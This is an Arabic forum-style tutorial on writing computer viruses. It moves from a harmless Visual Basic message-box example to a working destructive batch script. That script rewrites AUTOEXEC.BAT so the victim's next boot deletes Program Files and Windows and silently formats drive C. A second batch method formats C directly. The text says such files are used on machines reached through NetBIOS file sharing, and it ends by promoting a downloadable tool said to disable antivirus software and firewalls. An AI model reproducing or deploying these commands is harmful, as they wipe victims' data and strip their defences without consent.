تصــــميم
فيــــروس
سوف نقوم ببرمجة الفيروسات بلغة فيجول بيسك لانها
تعتبر الاسهل والاسرع على الرغم من ان بعض الفيروسات الشهيرة تبرمج بلغة السي
الاعتى والاقوى بين لغات البرمجة لكن اين كان ميولك البرمجي فسوف تستطيع
متابعة الدرس لاننا سوف نستخدم اجراءات واجهة البرمجة والتي تستطيع التعامل
معها معظم اللغات الرسومية مثل فيجول سي وفيجول بيسك ودلفي و باور بيلدر
حتى و لو لم
تكن مبرمجا من قبل ( انصحك بمتابعة الشرح حيث انهامن السهولة بمكان ) فهذة
الخطوات كفيلة بتعليمك اساسيات مهمة اتمنى التركيز في الشرح
الآن سوف يعرض لك البرنامج مشروع تلقائي يتكون من
نافذة ( فورم 1 ) سوف نقوم بحذفها وإضافة وحدة نمطية وسوف نكتب الشيفرة
داخلها وونفذ البرنامج من اجراء عام AddModule
RemoveForm1
اختر الامر Project كما هو واضح من قائمة
لايهم الترتيب احذف الفورم اولا او اضف الموديول المهم
احذف الفورم واضف الموديول وسوف يكون كتابةالشيفرة داخل نافذة الموديول
لان عملنا سوف لن يعرض للمستخدم اية واجهة رسومية
او نافذة
فقط هي رسالة بسيطة تحمل اوامر سهلة
س سوف نكتفي بتصميم البرنامج على ان يرسل للمستخدم رسالة وينتهي دون ان يفعل
شيئا آخر
هذا جزء صغير من النافذة التي ستعرض لك حالما تطلب اضافة وحدة نمطية او ما تسمى
بالانجليزي موديول اخترها ثم موافق لتنضم الي المشروع
من قائمة تولز اختر الامر
AddProceduer
سوف تعرض لك نافذة اضافة اجراء كما هو موضح اكتب
اسم الاجراء لابد ان يكون كلمة
main
في نافذة الموديول بعد ان توافق على الاجراء سوف يتم فتح النافذة اكتب مايلي
بين السطرين MsgBox "هذا تطبيق اول جزء في الشرح "
Public Sub main
End Sub
او على علامة السهم في شريط الادوات لتشغيل البرنامج
F5 الآن اضغط على المفتاح
عندما يعمل البرنامج سوف يقوم فقط بارسال الرسالة
التالية ثم ينتهي
وعلى فكرة ممكن تصمم فيروسات عن طريق برنامج الدفتر او
المفكرة
ممكن تصمم فيروس عن طريق لغة
HTML
تقدر تصمم فايرووس بنفسك وع طريق
نوت باد (المفكرة)....
يمكن تستغربوا من الفكرة احنى نعرف انا الفايرووسات يا يكون امتدادها
eXe (على الاغلب) او cih زي تشار وبل او اذا كان مكروو فايرووس يكون ايتدادة
حسب البرنامج الي
علية الفايروس يشتغل مثل الورد والاكسس والاكسل زغيرها ....
وعلى العموم الفكرة بكل بساطة انك تحط الاوامر (حقت الفايرووس) في ملف المفكرة
(notepad)
وتحفظها بأسم AUTOEXEC.BAT وبنفس السيغة
س:ليه نحفظ المف بهذا الالسم ليه
مش بأسم ثاني ؟
ج:وضع المف بهذا الاسم غير ضروري لاكن احنى نحطة بهذا الاسم لان اذا قفل الضحية
الجهاز وشغلة من جديد
يبدأ عملة الفايرووس (يعني لمن نحط هذا الالسم راح نظمن شغلة .
ودلوقتى طريقة التنفيذ/
طريقة التنفيذ بسيطة جدا وفية طريقتين لتنفذة :-
الاولى:وهية كل انك تعمل ملف جديد في النوت باد وتحط
الاوامر وتحفضة بصيغت AUTOEXEC.BAT
وهذي التفاصيل روح على أبدا(start) وبعدين برامج (program) بعدين برامج ملحقة
وبعدين روحوا على المفكرة (note pad) كويس وبعدين انسخ هذه
الاوامر فيها
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
ودلوقتى روح على ملف وبعدين حفظ باسم
هيطلعلك مربع حط اسم الملف AUTOEXEC.BAT
وحدد مكان الي تبريد تحط فيه الفايرووس واضغط موافق
وبس ....
هذا بالنسبة للطريقة الاولى اما الثانية وهية
روح على ابدأ (start) وبعدين برامج (program) وبعدين موجة الدوس (MS-DOS
Prompt)
اكتب في الدوس
edit 1.bat
لاحظتم انه فتح الادت بتاع الدوس
FORMAT /AUTOTEST C
وبعدين روح على
FILE
EXIT
YES
وبكذا تكون انشأت ملف بأمتداد bat
وخلااص هذا هوة الموضوع لاكن الموضع اكبر من كذا بكثير
لانك تقدر تمسح كل ملفات dll او sys او اي امتداد كان او تقدر تحذف ملفات معينة
في جهاز الضحية
او تفرمت دريف واحد من الي في جاهزة
واشياء كثييييييييرة هذا بس با اختصار شديد ....
متفارقات:
*من اكثر الاشياء الي تميز هذي الطريقة في صنع الفايرووس هية ان الفايرووس حجمه
صغييييييييير جدا
يعني اصغر فايرووس عندي (بعد الضغط) هوة فايرووس ussr696 حجمة على ما اعتقد
140بيات اما هذا
الفايرووس فحجمة اقل من كذا بكثير ومن دون ضغط وعلى حسب الاوامر الي تحطها في
الفايرووس .
*كثير جدا الي يستخدم هذا الطريقة اذا كان يريد يحوس
جهاز شخص خاصة الي يخترقوا عن طريق NetBios
(المشاركة في الملفات) لأن لاتكون عندهم مميزات
الاختراق عن طريق برنامج .
,
اقدم لكم برنامج avkillah الاصدار الثانى لقتل
الانتى فيروس فهو يقوم بقتل 124 ملف من ملفات الانتى فيرس
و كمان بيقتل ال firewalls و اعتقد انه لسه مكتشفش من النورتون و ادى الوصله
بتاعه الموضوع بتاعه فى الموقع
http://www.sinred.com/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=8&ttitle=AVKillah_2
|